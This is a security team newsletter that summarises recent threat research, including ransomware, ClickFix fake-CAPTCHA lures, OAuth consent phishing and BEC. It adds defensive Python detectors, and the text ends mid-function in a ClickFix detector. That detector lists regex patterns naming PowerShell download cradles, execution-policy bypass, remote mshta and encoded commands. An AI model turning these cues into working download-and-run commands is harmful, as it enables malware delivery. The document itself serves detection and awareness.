This is a newsletter I create and share with my internal security team. Feel free to grab and do the same.
CrazyHunter Ransomware’s Stealth Tactics and Attack Chain
Researchers have analyzed CrazyHunter, an evolving ransomware strain that combines stealthy evasion techniques with aggressive lateral movement. The ransomware disables security controls early in the attack chain, spreads across enterprise environments, and encrypts data using strong cryptography, making detection and recovery difficult.
Key Insights
Initial access is often gained through weak Active Directory credentials, followed by lateral movement using Group Policy abuse.
The ransomware uses bring-your-own-vulnerable-driver techniques to terminate security tools and evade detection.
Execution is staged: defenses are disabled first and the ransomware payload is loaded afterwards, with in-memory execution used along the way to leave few artifacts on disk.
Hybrid encryption is used: files are encrypted with a symmetric key, and that key is itself protected with the attackers' asymmetric public key, so recovery requires the private key that only the attackers hold.
Victims are pressured through data leak threats and direct extortion tactics.
Further Reading: Trellix
Sophisticated ClickFix Campaign Targeting the Hospitality Sector
A recent phishing campaign has been observed targeting the hospitality industry with a refined version of the ClickFix social-engineering technique. In this variant, victims are presented with what appears to be a routine human-verification prompt or CAPTCHA, but the displayed “fix” instructions lead them to execute commands on their systems. Once executed, these commands deploy remote-access malware that gives attackers control over endpoints, enabling credential theft, data exfiltration, or further malicious activity. Because the campaign leverages familiar prompts and trusted branding, users may be more likely to follow the steps without suspecting foul play.
Key Insights
Attackers are tailoring ClickFix lures to the hospitality sector’s workflows and terminology.
The campaign uses fake verification prompts that instruct victims to run benign-looking commands.
Executing these commands installs remote-access malware that compromises devices.
Social engineering remains a powerful vector when paired with familiar user interactions.
Further Reading: SecurityWeek
Analyzing PhaltBlyx: Fake BSODs and Trusted Build Tools Used to Construct a Malware Infection
Researchers have dissected a malware campaign involving PhaltBlyx, a deceptive infection method that combines social engineering with abuse of trusted development tools and fake system prompts. In this technique, victims encounter what appears to be a Blue Screen of Death (BSOD) or other alarming system error. Instead of indicating a real crash, the fake BSOD is used to convince the user to run repair or diagnostic tools — including legitimate build tools — that have been co-opted to execute malicious scripts. Once launched, these components pull additional payloads and establish persistence, often evading traditional security defenses because they’re routed through trusted binaries.
Key Insights
Fake system errors like bogus BSODs are used to create urgency and lower user skepticism.
Attackers abuse trusted development/build tools to execute malicious scripts, making detection harder.
Once executed, these scripts fetch and deploy additional malware components.
Using legitimate tools helps the infection evade security controls that trust known binaries.
Further Reading: Securonix
Cyber Criminal Ecosystem Analysis
Researchers have mapped the modern cyber criminal ecosystem, revealing how threat actors operate with increasing organization and specialization. Instead of lone attackers working in isolation, today’s underground economy functions more like a service industry — with distinct roles and marketplaces for phishing kits, malware, access brokers, and human-based attack services. This division of labor allows even low-skilled attackers to launch sophisticated campaigns by purchasing tools, infrastructure, or privileged access from others. Understanding this ecosystem helps defenders anticipate how capabilities and services evolve and how attacks scale.
Key Insights
The cyber criminal ecosystem now resembles a service economy with specialized roles and offerings.
Tool-and-infrastructure marketplaces lower the barrier to entry for new attackers.
Access brokers sell privileged access and footholds, enabling rapid exploitation.
Services like phishing-as-a-service and malware distribution are commoditized.
Human-based services (e.g., social-engineering or insider collaboration) are part of the overall attack chain.
Further Reading: Push Security
VoidLink: Cloud-Native Malware Framework Weaponizing Linux Infrastructure
Researchers have identified VoidLink, a cloud-native malware framework built specifically for Linux environments running in modern cloud infrastructure. Unlike traditional malware adapted for cloud use, VoidLink is designed from the ground up to operate in virtual machines, containers, and orchestration platforms. Its modular architecture allows operators to extend functionality while maintaining stealth, enabling long-term access and post-compromise activity across cloud workloads.
Key Insights
VoidLink is purpose-built for cloud-native Linux environments, including virtualized and containerized infrastructure.
A modular plug-in architecture allows operators to tailor capabilities such as reconnaissance, persistence, and lateral movement.
The framework can identify cloud environments and adapt its behavior to blend in with legitimate activity.
Stealth and anti-analysis techniques are used to reduce detection and support long-term operations.
The design suggests a well-resourced threat focused on cloud and infrastructure-level compromise.
Further Reading: Check Point Research
ConsentFix Debrief: Browser-Native OAuth Phishing
The ConsentFix debrief outlines a phishing technique that abuses legitimate OAuth consent flows to compromise accounts without stealing passwords or bypassing MFA. Instead of traditional credential harvesting, attackers trick victims into approving application access through a browser-based workflow, granting access tokens tied to trusted applications. This approach allows attackers to blend malicious activity into normal authentication behavior, making detection more difficult in enterprise identity environments.
Key Insights
ConsentFix abuses legitimate OAuth consent flows rather than harvesting credentials.
Attacks operate entirely within the browser, avoiding many endpoint and email-based detections.
MFA does not stop the attack because the victim completes a normal, fully authenticated sign-in (MFA included) and then approves the consent prompt; the tokens issued to the application are valid without any further challenge.
Targeting trusted or first-party applications helps attackers evade default access controls.
The technique reflects a shift toward identity-layer abuse rather than traditional phishing kits.
Further Reading: Push Security
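Because ConsentFix leaves a consent grant rather than a stolen password, the durable artifact to hunt is the grant itself. The script below is an added example written for this newsletter, not Push Security's tooling. It scores constructed consent-grant records on user-level consent, privileged scopes, offline_access, an unverified publisher and app age. The consent_type values Principal and AllPrincipals and the scope names follow Microsoft Graph's naming; the record layout, the weights and the threshold of 5 are assumptions to tune locally.

```python
"""Audit OAuth consent grants for the pattern ConsentFix relies on: a single user consenting to an
application that receives privileged, long-lived access. Records are constructed; the field layout is
a simplified stand-in for an identity provider's consent audit data (assumption)."""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Microsoft Graph delegated permission names; any of these lets an app read or act on user data.
HIGH_RISK_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
                    "Files.Read.All", "Files.ReadWrite.All", "Sites.Read.All", "Contacts.Read",
                    "Directory.Read.All", "User.Read.All"}
# offline_access yields a refresh token, so access survives the browser session and sign-out.
PERSISTENCE_SCOPES = {"offline_access"}
NEW_APP_AGE = timedelta(days=30)   # assumption: apps registered shortly before consent deserve a look

@dataclass
class ConsentGrant:
    app_display_name: str
    consent_type: str        # "Principal" = one user consented; "AllPrincipals" = admin consent for the tenant
    scopes: list
    publisher_verified: bool
    app_created: datetime
    granted_at: datetime
    granted_by: str

def score_grant(g: ConsentGrant) -> tuple[int, list]:
    """Return (score, reasons). Weights are assumptions, not a vendor's model."""
    score, reasons = 0, []
    scopes = set(g.scopes)
    risky = sorted(scopes & HIGH_RISK_SCOPES)
    if risky:
        score += 3
        reasons.append("high-privilege scopes: " + ", ".join(risky))
    if scopes & PERSISTENCE_SCOPES:
        score += 2
        reasons.append("offline_access: refresh token outlives the browser session")
    if g.consent_type == "Principal" and risky:
        score += 2
        reasons.append("user-level consent to privileged scopes, no admin review")
    if not g.publisher_verified:
        score += 2
        reasons.append("publisher not verified")
    if g.granted_at - g.app_created < NEW_APP_AGE:
        score += 2
        reasons.append("app registered less than 30 days before consent")
    return score, reasons

def audit(grants, threshold: int = 5) -> list:
    """Grants at or above the threshold, highest score first."""
    findings = []
    for g in grants:
        score, reasons = score_grant(g)
        if score >= threshold:
            findings.append({"app": g.app_display_name, "user": g.granted_by,
                             "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])

# Constructed records: one consent-phishing style grant, one tenant-wide admin grant, one benign user grant.
NOW = datetime(2026, 1, 20, 10, 0)
SAMPLE_GRANTS = [
    ConsentGrant("Mailbox Backup Helper", "Principal",
                 ["openid", "offline_access", "Mail.ReadWrite", "Files.ReadWrite.All"],
                 False, NOW - timedelta(days=3), NOW, "alice@contoso.example"),
    ConsentGrant("Corporate Intranet Portal", "AllPrincipals", ["openid", "User.Read"],
                 True, NOW - timedelta(days=2000), NOW - timedelta(days=400), "admin@contoso.example"),
    ConsentGrant("Contoso Expense Tool", "Principal", ["User.Read", "offline_access"],
                 True, NOW - timedelta(days=500), NOW - timedelta(days=2), "bob@contoso.example"),
]

if __name__ == "__main__":
    for f in audit(SAMPLE_GRANTS):
        print(f"{f['score']:>2} {f['app']} ({f['user']}): {'; '.join(f['reasons'])}")
```

If the abused application is a trusted first-party one, the publisher check contributes nothing and the remaining signals carry the finding; user-level consent to privileged scopes is the strongest of them. The standard preventive control is to require admin consent for privileged scopes, so that the Principal path cannot be completed by a phished user at all.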
CrashFix Browser Extension Campaign Delivers ModeloRAT
Researchers identified a campaign linked to the threat actor KongTuke that uses a malicious browser extension to compromise systems. The extension poses as a legitimate utility, such as an ad blocker, but is designed to intentionally destabilize the browser. Victims are then presented with fake error messages that guide them into executing attacker-controlled commands, ultimately leading to the installation of a remote-access Trojan.
Key Insights
The attack relies on a malicious browser extension disguised as a legitimate tool.
The extension deliberately crashes the browser to prompt user interaction.
Victims are socially engineered into running commands that install additional malware.
Corporate, domain-joined systems are targeted with more advanced payloads.
The technique combines social engineering with browser abuse rather than traditional phishing links.
Further Reading: Huntress
Microsoft Remains the Most Imitated Brand in Phishing Attacks in Q4 2025
Check Point Research reports that Microsoft continued to be the most frequently impersonated brand in phishing attacks during Q4 2025. Attackers consistently leverage trusted, widely used brands to increase the likelihood of user interaction and credential compromise, particularly for access to email, cloud services, and productivity platforms. Technology companies remain the most attractive targets due to the value of associated identities and accounts.
Key Insights
Microsoft accounted for the largest share of brand-based phishing attempts in Q4 2025.
Technology brands dominate phishing campaigns due to their broad user bases and access value.
Other commonly impersonated brands included Google, Amazon, Apple, and Meta.
Phishing lures often rely on realistic branding and subtle impersonation techniques to appear legitimate.
Further Reading: Check Point Research
Open-Source Python Script Drives Social Media Phishing Campaign
Threat researchers identified a phishing campaign leveraging social media direct messages to distribute malicious files that ultimately lead to remote access trojan deployment. The activity relies on weaponized archives, DLL sideloading, and a legitimate open-source Python script to execute payloads while blending in with normal software behavior. The campaign highlights how threat actors are expanding beyond email to exploit trust within professional networking platforms.
Key Insights
Social media direct messages are being used as a primary delivery mechanism, allowing attackers to bypass traditional email security controls.
The infection chain abuses DLL sideloading with legitimate applications and a portable Python environment to execute malicious activity.
Use of an open-source Python script reduces development effort while complicating detection by appearing benign.
Post-execution behavior indicates persistence and command-and-control communication consistent with remote access tooling.
Targeting suggests a focus on corporate users, where social engineering via trusted platforms increases engagement.
Further Reading: ReliaQuest
Payroll Diversion via Help Desk Social Engineering
Threat researchers analyzed an incident in which attackers used phone-based social engineering to manipulate help desk workflows and redirect employee payroll to attacker-controlled bank accounts. By impersonating employees and exploiting weak identity verification processes, the adversary reset credentials, re-registered multi-factor authentication devices, and modified payroll details without exploiting technical vulnerabilities. The activity demonstrates how human-focused tactics can enable financial fraud while evading traditional security controls.
Key Insights
The attack relied on voice-based impersonation of employees to bypass help desk authentication procedures.
Publicly available personal details were used to satisfy challenge-response questions and gain account access.
Credential resets and MFA re-enrollment enabled control over payroll, HR, and IT-related systems.
Payroll redirection remained undetected until employees reported missing paychecks.
The intrusion exposed gaps in identity change monitoring and cross-departmental alerting.
Further Reading: Unit 42
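The last two points are a correlation problem: a help-desk password reset, an MFA re-enrollment and a payroll bank change are each routine on their own and are logged by different systems. The function below is an added example, not Unit 42's detection content. It joins constructed identity and HR events per user and alerts when a sensitive change follows a help-desk trigger inside a window; the event type names, the 72-hour window and the severity rule are assumptions.

```python
"""Correlate identity-change events with sensitive HR/mailbox changes per user.
Event type names, field names and the sample events are constructed for this example."""
from collections import defaultdict
from datetime import datetime, timedelta

# Actions a social-engineered help desk (or a freshly reset account) produces first.
TRIGGERS = {"helpdesk_password_reset", "mfa_method_added", "mfa_method_removed"}
# Changes that turn account control into money or persistence.
SENSITIVE = {"payroll_bank_change", "direct_deposit_change", "mailbox_forwarding_added"}
WINDOW = timedelta(hours=72)   # assumption: tune to how fast these changes normally happen

def correlate_identity_changes(events, window: timedelta = WINDOW) -> list:
    """events: dicts with 'user', 'time' (datetime), 'type', 'actor'.
    Returns one alert per sensitive change preceded by a trigger within the window."""
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        for i, e in enumerate(evs):
            if e["type"] not in SENSITIVE:
                continue
            prior = [p for p in evs[:i]
                     if p["type"] in TRIGGERS and e["time"] - p["time"] <= window]
            if not prior:
                continue
            kinds = sorted({p["type"] for p in prior})
            # A help-desk reset followed by an MFA change is the full takeover sequence.
            severity = "high" if "helpdesk_password_reset" in kinds and len(kinds) >= 2 else "medium"
            alerts.append({"user": user, "change": e["type"], "at": e["time"].isoformat(),
                           "preceded_by": kinds, "severity": severity})
    return alerts

# Constructed events: one full takeover sequence, one stale MFA change, one lone payroll change,
# and one MFA change followed by mail forwarding.
T0 = datetime(2026, 2, 2, 9, 0)
SAMPLE_EVENTS = [
    {"user": "j.doe", "time": T0, "type": "helpdesk_password_reset", "actor": "helpdesk-agent-7"},
    {"user": "j.doe", "time": T0 + timedelta(minutes=25), "type": "mfa_method_added", "actor": "j.doe"},
    {"user": "j.doe", "time": T0 + timedelta(hours=29), "type": "payroll_bank_change", "actor": "j.doe"},
    {"user": "a.lee", "time": T0, "type": "mfa_method_added", "actor": "a.lee"},
    {"user": "a.lee", "time": T0 + timedelta(days=10), "type": "payroll_bank_change", "actor": "a.lee"},
    {"user": "m.chen", "time": T0 + timedelta(hours=2), "type": "payroll_bank_change", "actor": "m.chen"},
    {"user": "r.patel", "time": T0, "type": "mfa_method_added", "actor": "r.patel"},
    {"user": "r.patel", "time": T0 + timedelta(hours=5), "type": "mailbox_forwarding_added", "actor": "r.patel"},
]

if __name__ == "__main__":
    for a in correlate_identity_changes(SAMPLE_EVENTS):
        print(a)
```

In practice the three feeds arrive in different formats and on different clocks; normalizing them to a common user key and timezone is the work that makes this detection possible, and that join is exactly the cross-departmental gap the incident exposed.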
AI-Powered HTMLMIX Obfuscation Tool Reshapes Phishing Tactics
Threat researchers analyzed HTMLMIX, an AI-enabled phishing obfuscation platform actively used to generate large volumes of unique phishing emails. The tool automates HTML code transformation and content variation to undermine signature-based detection, enabling attackers to scale phishing campaigns while maintaining high delivery success. This activity reflects a broader shift toward AI-assisted automation within phishing operations.
Key Insights
HTMLMIX programmatically alters HTML structure to produce thousands of distinct email variants from a single template.
Automated obfuscation techniques include layout restructuring, CSS manipulation, and hidden character insertion to evade pattern-based detection.
AI-driven content features introduce language variation, preview text changes, and fabricated email threads to increase realism.
API-based workflows allow the tool to integrate directly into phishing delivery pipelines for rapid campaign scaling.
Short-lived redirect infrastructure is used to mask malicious destinations and improve initial deliverability.
Further Reading: Abnormal AI
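The obfuscation HTMLMIX applies (hidden elements, restructured layout, hidden characters) targets scanners that look at raw HTML. The parser below is an added example and not Abnormal's detection: it extracts the text a recipient would actually see, discarding elements hidden by inline CSS and stripping zero-width characters, and reports how much hiding was present. The sample message is constructed, and the hidden-style patterns, the zero-width code point set and the thresholds are the editor's own.

```python
"""Recover the text a recipient sees from obfuscated phishing HTML.
Sample message is constructed; style patterns and thresholds are the editor's choices."""
import re
from html.parser import HTMLParser

ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff", "\u00ad"}   # includes soft hyphen
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|font-size\s*:\s*0(\.0+)?(px|pt|em)?\s*(;|$|!)|opacity\s*:\s*0(\.0+)?\s*(;|$|!)",
    re.I)

class VisibleTextExtractor(HTMLParser):
    VOID = {"br", "img", "hr", "meta", "link", "input", "area", "base", "col", "wbr"}
    SKIP = {"script", "style", "head", "title"}   # never rendered, so not counted as hiding

    def __init__(self):
        super().__init__()   # convert_charrefs=True: &#8203; arrives as U+200B in handle_data
        self.parts, self._stack = [], []
        self.suppressed = 0          # open ancestors that hide their content
        self.hidden_elements = 0     # elements hidden through inline CSS
        self.zero_width_chars = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.VOID:
            return
        style = dict(attrs).get("style") or ""
        hidden = tag in self.SKIP or bool(HIDDEN_STYLE.search(style))
        if hidden and tag not in self.SKIP:
            self.hidden_elements += 1
        self._stack.append(hidden)
        self.suppressed += hidden
        self.parts.append(" ")       # element boundaries separate words

    def handle_endtag(self, tag):
        if tag in self.VOID or not self._stack:
            return
        self.suppressed -= self._stack.pop()
        self.parts.append(" ")

    def handle_data(self, data):
        self.zero_width_chars += sum(ch in ZERO_WIDTH for ch in data)
        if self.suppressed == 0:
            self.parts.append("".join(ch for ch in data if ch not in ZERO_WIDTH))

    def text(self) -> str:
        return re.sub(r"\s+", " ", "".join(self.parts)).strip()

def analyze(html: str) -> dict:
    p = VisibleTextExtractor()
    p.feed(html)
    p.close()
    return {"visible_text": p.text(), "hidden_elements": p.hidden_elements,
            "zero_width_chars": p.zero_width_chars}

def looks_obfuscated(report: dict, max_hidden: int = 1, max_zero_width: int = 2) -> bool:
    """Thresholds are assumptions; legitimate marketing mail uses a little of both."""
    return report["hidden_elements"] > max_hidden or report["zero_width_chars"] > max_zero_width

# Constructed lure: keywords split by zero-width spaces, filler text hidden with inline CSS.
SAMPLE_HTML = (
    '<html><head><style>.x{}</style></head><body>'
    '<p>Your acc&#8203;ount pass&#8203;word exp&#8203;ires to&#8203;day.</p>'
    '<span style="display:none">lorem ipsum weekly newsletter digest</span>'
    '<div style="font-size:0px">unrelated filler text to dilute keyword ratios</div>'
    '<p>Click <a href="https://example.invalid/verify">here</a> to ver&#8204;ify.</p>'
    '</body></html>'
)

if __name__ == "__main__":
    report = analyze(SAMPLE_HTML)
    print(report, "obfuscated" if looks_obfuscated(report) else "clean")
```

Keyword and brand checks should run on visible_text, not on the raw markup: in the sample, "password" never occurs contiguously in the HTML. Email HTML is often malformed, so a production version should tolerate unclosed tags; here an unclosed hidden element would suppress everything after it.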
Fake CAPTCHA Pop-Ups Used to Trick Website Visitors
A campaign known as ClearFake is using compromised websites to display fake verification pop-ups that look like routine security checks. These prompts guide visitors through simple steps that appear harmless but actually trigger hidden commands on their computers. Because the scam appears on real, trusted websites, it can be difficult for everyday users to recognize what’s happening.
Key Points
Legitimate websites are being altered to display fake verification messages.
The pop-ups instruct users to perform basic actions that quietly run harmful commands.
Familiar technology and services are used to make the activity seem normal.
Once the commands run, additional unwanted software can be installed without clear warning.
The use of trusted websites and common prompts increases the likelihood of user interaction.
Further Reading: Expel
2026 Threat Forecast: Top Cyberattacks Set to Increase Enterprise Exposure
Email remains the primary entry point for attackers, and emerging campaigns are increasingly focused on exploiting trust, identity, and routine workflows to bypass defenses. Threat actors are layering social engineering techniques with technical evasion methods to increase success rates and reduce detection, signaling a continued shift toward human-centric attack vectors.
Key Insights
Attackers are refining multi-stage phishing workflows (e.g., QR codes and vendor impersonation) to condition targets and evade security controls.
Social engineering remains central, with threat actors embedding themselves in legitimate communication threads to increase credibility.
Look-alike domains, branding mimicry, and personalized phishing pages are becoming more common to improve credential theft success.
Email continues to be the most reliable initial access vector due to its ubiquity and reliance on human interaction.
Further Reading: Abnormal AI
Real-Time Malicious JavaScript Generated Through LLMs
Threat researchers identified a technique where attackers use large language models to generate malicious JavaScript code in real time inside a victim’s browser. Instead of hosting harmful code on attacker-controlled infrastructure, the webpage dynamically requests code generation during the visit, producing phishing functionality only at execution time. This approach makes the activity harder to detect because the malicious content does not exist until the moment it runs.
Key Insights
Malicious JavaScript is generated dynamically during page visits rather than being stored on a server.
Each execution produces unique code, reducing the effectiveness of signature-based detection.
Requests to trusted LLM service domains can blend in with normal web traffic.
The technique enables phishing pages to be customized in real time based on victim context.
Detection becomes more difficult because the malicious logic exists only briefly in the browser.
Further Reading: Unit 42
Phishing Messages Masquerade as Collaboration Platform Invites
A phishing campaign is abusing trusted collaboration platform notifications to deliver scam messages that look like legitimate invitations. By using real platform features, the messages appear routine and familiar, increasing the chances that recipients engage without questioning them. Instead of pushing malicious links, the messages often steer people toward fake support interactions.
Key Points
Legitimate collaboration platform features are being used to send deceptive invitations.
Messages are designed to look like normal work notifications, such as billing or subscription alerts.
Some scams avoid links entirely and instead prompt users to contact fraudulent support numbers.
The volume of messages is high, affecting users across many organizations.
Familiar workplace tools are being leveraged to make scams feel routine and trustworthy.
Further Reading: Check Point
Kimwolf Botnet Embedded in Corporate and Government Networks
Threat researchers reported widespread activity tied to the Kimwolf botnet, which has infected millions of internet-connected devices and is now appearing inside corporate and government environments. Once embedded, compromised devices can be used to relay malicious traffic, participate in large-scale denial-of-service activity, and scan internal networks for additional targets. The presence of consumer-grade devices inside enterprise environments is expanding the botnet’s reach beyond its original footprint.
Key Insights
Kimwolf primarily spreads through compromised internet-connected devices, including consumer hardware.
Infected systems are used to generate large volumes of malicious traffic and denial-of-service activity.
Once inside an organization, compromised devices can scan internal networks for other reachable systems.
Residential proxy infrastructure is leveraged to mask command-and-control activity.
The botnet’s scale and persistence indicate continued risk despite partial disruption efforts.
Further Reading: KrebsOnSecurity
Infostealer Data Cache Exposes 149 Million Credentials
Threat researchers identified a large, publicly accessible database containing roughly 149 million stolen login credentials. The data was collected by infostealer malware that silently harvests usernames and passwords from infected devices and aggregates them for later use. Because the database was left exposed without protection, the credentials could be accessed and abused for large-scale account takeover, fraud, and follow-on intrusion activity.
Key Insights
The dataset contained approximately 149 million unique username and password combinations.
Infostealer malware was the likely source, collecting credentials directly from compromised endpoints.
Exposed credentials spanned a wide range of services, including email, financial platforms, and consumer accounts.
Some entries were associated with corporate, government, and educational domains, increasing targeting risk.
The unsecured database remained accessible long enough to pose a meaningful risk of reuse by other threat actors.
Further Reading: ExpressVPN
Multi-Stage AiTM Phishing and BEC Campaign Abusing SharePoint
Threat researchers uncovered a coordinated campaign that combines adversary-in-the-middle phishing with business email compromise techniques. The activity abuses trusted cloud collaboration services to deliver phishing lures, steal session data, and expand access once an initial account is compromised. By leveraging familiar internal workflows, the attackers were able to spread both inside and outside targeted organizations.
Key Insights
Phishing lures were designed to look like legitimate SharePoint document shares from trusted senders.
Stolen credentials and session tokens allowed attackers to bypass standard login protections.
Malicious inbox rules were created to hide follow-on activity and maintain access.
Compromised accounts were used to send additional phishing messages to internal and external contacts.
The campaign demonstrates how trusted collaboration platforms can be misused to scale email compromise.
Further Reading: Microsoft Security Blog
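The inbox rules in this campaign are the most durable signal: they keep working after the stolen session token expires. The check below is an added example and not Microsoft's detection logic. It scores constructed mailbox rules on the traits BEC rules tend to share (external forwarding, deletion, moves to rarely viewed folders such as RSS Feeds, keyword filters on invoice or payment themes, and a name made only of punctuation). The rule field names are a simplified stand-in for real mailbox rule properties, and the weights and threshold of 3 are assumptions.

```python
"""Score mailbox inbox rules for business email compromise traits.
Rule field names are a simplified stand-in (assumption); sample rules are constructed."""
import re

# Folders users rarely open; attackers park hidden conversations there.
SUSPICIOUS_FOLDERS = {"rss feeds", "rss subscriptions", "conversation history",
                      "archive", "junk email", "deleted items"}
# Words attackers filter on to hide payment traffic and security warnings from the victim.
BEC_KEYWORDS = re.compile(
    r"\b(invoice|payment|wire|remit|bank|password|mfa|verification|suspicious|hacked|phishing|helpdesk|security)\b",
    re.I)

def assess_inbox_rule(rule: dict, internal_domains: set) -> tuple[int, list]:
    """rule keys: mailbox, name, forward_to (list), delete (bool), move_to (str),
    mark_as_read (bool), conditions (list of matched substrings). Returns (score, reasons)."""
    score, reasons = 0, []
    if not re.search(r"[A-Za-z0-9]", rule.get("name", "")):
        score += 1
        reasons.append("rule name has no letters or digits")
    for addr in rule.get("forward_to", []):
        domain = addr.rsplit("@", 1)[-1].lower()
        if domain not in internal_domains:
            score += 3
            reasons.append(f"forwards externally to {addr}")
    if rule.get("delete"):
        score += 2
        reasons.append("deletes matching messages")
    if (rule.get("move_to") or "").lower() in SUSPICIOUS_FOLDERS:
        score += 2
        reasons.append(f"moves messages to rarely viewed folder '{rule['move_to']}'")
    if rule.get("mark_as_read"):
        score += 1
        reasons.append("marks messages as read")
    hits = [c for c in rule.get("conditions", []) if BEC_KEYWORDS.search(c)]
    if hits:
        score += 1
        reasons.append("matches BEC-themed keywords: " + ", ".join(hits))
    return score, reasons

def find_suspicious_rules(rules, internal_domains: set, threshold: int = 3) -> list:
    findings = []
    for r in rules:
        score, reasons = assess_inbox_rule(r, internal_domains)
        if score >= threshold:
            findings.append({"mailbox": r["mailbox"], "name": r["name"],
                             "score": score, "reasons": reasons})
    return findings

INTERNAL_DOMAINS = {"contoso.example"}
# Constructed rules: a classic hide-the-evidence rule, an external forward, and two benign rules.
SAMPLE_RULES = [
    {"mailbox": "alice@contoso.example", "name": ".", "move_to": "RSS Feeds", "mark_as_read": True,
     "conditions": ["invoice", "payment", "hacked"]},
    {"mailbox": "alice@contoso.example", "name": "Personal copy",
     "forward_to": ["alice.backup@mail.example"]},
    {"mailbox": "bob@contoso.example", "name": "Newsletters", "move_to": "Newsletters",
     "conditions": ["weekly digest"]},
    {"mailbox": "bob@contoso.example", "name": "Team alias", "forward_to": ["team@contoso.example"],
     "conditions": ["status"]},
]

if __name__ == "__main__":
    for f in find_suspicious_rules(SAMPLE_RULES, INTERNAL_DOMAINS):
        print(f"{f['score']:>2} {f['mailbox']} rule {f['name']!r}: {'; '.join(f['reasons'])}")
```

Rule creation events are worth alerting on in their own right when they coincide with a sign-in from a new device or location, since the AiTM session and the rule are usually created minutes apart.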
Fake CAPTCHA Prompts Used to Trick Users Into Installing Malware
Researchers have identified a scam that uses fake “CAPTCHA” verification screens to deceive users into installing malicious software. Instead of a simple checkbox, these prompts instruct people to copy and run a command on their own device, which secretly launches malware designed to steal sensitive information. Because the steps look like a normal verification process, many users don’t realize anything is wrong until after their system is compromised.
Key Points
Fake CAPTCHA pages instruct users to manually run commands as part of a supposed verification step.
Following these instructions can silently install malware on the device.
The malware is designed to collect sensitive data such as saved passwords and browser information.
Trusted system tools are abused to make the activity look legitimate.
The attack relies heavily on user interaction, making it harder to spot at first glance.
Further Reading: Blackpoint Cyber
Scam Emails Abuse a Real Microsoft Address
Scammers are sending fraudulent emails that appear to come from a legitimate Microsoft notification address, making the messages look trustworthy at first glance. Because these emails originate from a real Microsoft service that some organizations allow by default, they can slip past spam filters and land directly in inboxes. The messages often claim an urgent issue, such as an unexpected charge, and push recipients to take immediate action.
Key Points
Scam messages are being sent from a real Microsoft notification address.
The emails are designed to look authentic and bypass some email filters.
Messages often create urgency by claiming billing or account problems.
Recipients may be directed to call a phone number controlled by scammers.
Trusted services can be abused to make scams more convincing.
Further Reading: Ars Technica
Detection and Response Are Moving Beyond the Endpoint
Security teams are reassessing the limits of traditional endpoint detection and response (EDR) tools as more attacks avoid touching the operating system altogether. Modern threat activity increasingly unfolds inside browsers and cloud applications, where users authenticate, access data, and perform daily work. This shift is driving interest in detection and response capabilities that extend beyond endpoints to cover browser-based attack paths.
Key Insights
EDR remains effective for threats that execute directly on a device, such as malware and suspicious process activity.
Many modern attacks operate entirely within browsers, targeting credentials, sessions, and cloud access.
Browser-based phishing, session hijacking, and token theft may generate little or no endpoint telemetry.
Attackers are adapting to where users work, focusing on identity and access rather than device compromise.
Security strategies are increasingly combining endpoint visibility with browser-level detection.
Further Reading: Push Security
TA584 Continues to Evolve Its Initial Access Playbook
Threat researchers report that the activity cluster tracked as TA584 continues to adapt how it gains initial access to victim environments. The group remains highly active, cycling through new email lures, delivery techniques, and malware families to keep campaigns effective. This ongoing evolution highlights how initial access operations are becoming more flexible and harder to disrupt through static defenses alone.
Key Insights
TA584 operates as a high-volume initial access actor with frequent changes to campaign themes and infrastructure.
Email remains the primary delivery method, with lures tailored to specific regions, brands, or current events.
Campaigns increasingly rely on redirection chains and customized landing pages to drive user interaction.
The actor rotates malware families, including remote access tools that can enable follow-on activity such as ransomware.
Rapid campaign turnover reduces the effectiveness of signature-based and content-only detections.
Further Reading: Proofpoint
IClickFix Framework Abuses Compromised WordPress Sites to Deliver Malware
Threat researchers have identified a large-scale malicious framework known as IClickFix that leverages compromised WordPress websites to distribute malware. Visitors to affected sites may be presented with deceptive verification prompts designed to trick them into manually executing commands on their own systems. This approach combines widespread infrastructure abuse with social engineering to infect victims at scale.
Key Insights
IClickFix injects malicious scripts into compromised WordPress sites to redirect visitors to deceptive prompts.
Victims are shown fake CAPTCHA-style challenges that instruct them to copy and run commands.
Executing these commands leads to malware installation without exploiting a software vulnerability.
The framework has been active for months and has impacted thousands of websites globally.
Delivered payloads include tools that enable persistent remote access to infected systems.
Further Reading: SEKOIA Blog
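The ClickFix, ClearFake, fake-CAPTCHA and IClickFix items above all end the same way: the victim pastes a command into the Run dialog and an interpreter pulls remote content. The detection logic below is an added example written for this newsletter, not code from SEKOIA, Expel, Blackpoint or SecurityWeek. It scores Sysmon-style process-creation events and RunMRU registry values; the events, commands and hostnames are constructed, the cue list is the editor's own, and the threshold of 3 is an assumption to tune against local baselines.

```python
"""Flag process-creation events that match the ClickFix execution pattern: a user pastes a command
into the Run dialog (parent explorer.exe) and an interpreter fetches remote content.
All sample events and registry values are constructed, not real telemetry."""
import re
from dataclasses import dataclass

# Interpreters and download utilities that ClickFix-style lures ask the victim to launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe",
                "certutil.exe", "bitsadmin.exe"}
# A parent of explorer.exe means the Run dialog or the shell started it, i.e. a user typed it.
USER_LAUNCHERS = {"explorer.exe"}
# Command-line cues: download cradle, hidden window, policy bypass, remote HTA, encoded payload,
# and the "verification" comment some lures append so the clipboard looks like a CAPTCHA step.
CUES = [
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "inline evaluation"),
    (re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I), "download cradle"),
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"mshta(\.exe)?\s+https?://", re.I), "remote HTA"),
    (re.compile(r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"(i am not a robot|recaptcha|verification id)", re.I), "CAPTCHA-themed comment"),
]

@dataclass
class Verdict:
    suspicious: bool
    score: int
    reasons: list

def basename(path: str) -> str:
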